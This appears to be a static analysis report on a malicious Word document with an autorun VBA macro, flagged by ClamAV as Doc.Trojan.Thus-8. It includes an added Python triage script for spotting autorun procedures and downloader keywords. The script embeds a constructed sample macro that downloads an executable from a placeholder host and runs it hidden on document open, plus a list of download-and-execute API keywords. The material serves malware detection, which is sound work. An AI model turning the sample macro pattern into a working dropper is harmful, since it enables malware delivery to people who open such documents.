Malicious Office (OLE) — malware analysis report

Static analysis result for SHA-256 0ff8a0574a4acf03…

MALICIOUS

Office (OLE)

Size: 45.5 KB   Created: 2010-04-22 13:33:00   Authoring application: Microsoft Word 11.3.8
MD5: c41c4d3d79e68c632b34e59f92e95b4b   SHA-1: a33911b7ec1c4dc9118dc1dfdf5516f27e4dbad3   SHA-256: 0ff8a0574a4acf03620ba007d1f7b981adcb31533b025d5c56f07c826320b002
Risk score: 180

Malware Insights

MITRE ATT&CK
T1059.005 Command and Scripting Interpreter: Visual Basic
T1566.001 Phishing: Spearphishing Attachment

The sample contains a VBA project with a Document_Open procedure, which Word runs automatically when the document is opened (if macros are enabled), a standard way to execute code with no further user interaction beyond opening the attachment. The ClamAV signature Doc.Trojan.Thus-8 fires on both the document itself and the macro source extracted from it, which strongly indicates malicious intent. The macro appears to be designed to download and execute a second-stage payload, although the full URL and execution details are truncated in the recovered source; the decoded macros.bas artifact listed below should be reviewed directly to confirm the download target and launch method.

Heuristics (4)

  • ClamAV: Doc.Trojan.Thus-8 critical CLAMAV_DETECTION
    ClamAV detected this file as malware: Doc.Trojan.Thus-8
  • ClamAV detection on extracted artifact critical EXTRACTED_FILE_CLAMAV
    ClamAV flagged at least one file extracted from inside this sample. Even when the wrapping document carries no AV detection of its own, a hit on the carved artifact is a strong indicator that the sample is a delivery vehicle.
  • Document_Open macro high OLE_VBA_DOCOPEN
    The VBA project defines a Document_Open procedure, an autorun entry point that Word executes as soon as the document is opened with macros enabled.
  • VBA macros detected medium OLE_VBA_MACROS
    Document contains VBA macro code
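The OLE_VBA_DOCOPEN and OLE_VBA_MACROS heuristics above operate on the decoded VBA source once it has been carved out of the OLE container (the report attributes extraction to oletools' olevba). The following is an added example, not the report tool's or oletools' code: it takes already-extracted VBA source, hashes it the way the artifact table does, looks for autorun procedures and downloader keywords, and emits heuristics with the same identifiers and severities as the report. The `VBA_SUSPICIOUS_KEYWORDS` identifier and the sample macro are constructed for this example and are not taken from the analysed document.

```python
"""Triage decoded VBA source: autorun entry points and downloader keywords.

Added example; not the analysis tool's own code. Operates on VBA source that
has already been extracted from the OLE file (e.g. by oletools' olevba).
"""
import hashlib
import re

# Procedure names Office runs automatically, without a user invoking them.
AUTOEXEC_PROCS = (
    "Document_Open", "AutoOpen", "Auto_Open",
    "Workbook_Open", "Document_Close", "AutoExec",
)

# Keywords that commonly appear in a download-and-execute stage.
SUSPICIOUS_KEYWORDS = (
    "Shell", "WScript.Shell", "CreateObject", "URLDownloadToFile",
    "MSXML2.XMLHTTP", "ADODB.Stream", "powershell", "Environ",
)

# Constructed sample macro for the demo (NOT the macros.bas from this report).
# ".invalid" is a reserved TLD, so the URL cannot resolve.
SAMPLE_VBA = """\
Attribute VB_Name = "ThisDocument"
Private Sub Document_Open()
    Dim h As Object
    Set h = CreateObject("MSXML2.XMLHTTP")
    h.Open "GET", "http://example.invalid/stage2.exe", False
    h.Send
    Shell Environ("TEMP") & "\\update.exe", vbHide
End Sub
"""

# Matches "Sub Name" / "Function Name" with optional Private/Public/Static.
PROC_RE = re.compile(
    r"^\s*(?:(?:Private|Public|Friend)\s+)?(?:Static\s+)?(?:Sub|Function)\s+(\w+)",
    re.I | re.M,
)


def sha256_hex(source):
    """SHA-256 of the decoded source, as shown in the artifact table."""
    return hashlib.sha256(source.encode("utf-8")).hexdigest()


def find_autoexec(source):
    """Return autorun procedure names defined in the module, in AUTOEXEC_PROCS order."""
    defined = {name.lower() for name in PROC_RE.findall(source)}
    return [name for name in AUTOEXEC_PROCS if name.lower() in defined]


def find_keywords(source):
    """Return suspicious keywords present (case-insensitive), in SUSPICIOUS_KEYWORDS order."""
    return [kw for kw in SUSPICIOUS_KEYWORDS
            if re.search(re.escape(kw), source, re.I)]


def triage(source):
    """Emit (identifier, severity, description) heuristics for one VBA module.

    A module that only carries Attribute lines and no procedures yields no
    heuristics: that is the edge case where "a VBA stream exists" must not be
    reported as "the document contains macro code".
    """
    heuristics = []
    if PROC_RE.search(source):
        heuristics.append(("OLE_VBA_MACROS", "medium", "Document contains VBA macro code"))
    autoexec = find_autoexec(source)
    if autoexec:
        heuristics.append(("OLE_VBA_DOCOPEN", "high",
                           "Autorun procedure(s): " + ", ".join(autoexec)))
    keywords = find_keywords(source)
    if keywords:
        # Hypothetical identifier for this example; not one the report uses.
        heuristics.append(("VBA_SUSPICIOUS_KEYWORDS", "medium",
                           "Downloader/execution keywords: " + ", ".join(keywords)))
    return {"sha256": sha256_hex(source), "autoexec": autoexec,
            "keywords": keywords, "heuristics": heuristics}


if __name__ == "__main__":
    result = triage(SAMPLE_VBA)
    print("SHA-256:", result["sha256"])
    for ident, severity, desc in result["heuristics"]:
        print(f"  {ident:<24} {severity:<7} {desc}")
```

Run against real output from olevba, the autorun check is what separates "the document has macros" (medium) from "code runs on open" (high); the keyword pass is only a pointer to what to read next in the source, not a verdict on its own.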

Extracted artifacts (1)

Files carved from inside the sample during analysis.

Filename: macros.bas
SHA-256: 9e0d7564540cd977337db3968daecad84f1a71282ddad42de3b7276dedf27a7f
Kind: vba-macro
Source: oletools.olevba.extract_macros (decoded VBA source)
Size: 2405 bytes
Detection: ClamAV: Doc.Trojan.Thus-8
Obfuscation or payload: unlikely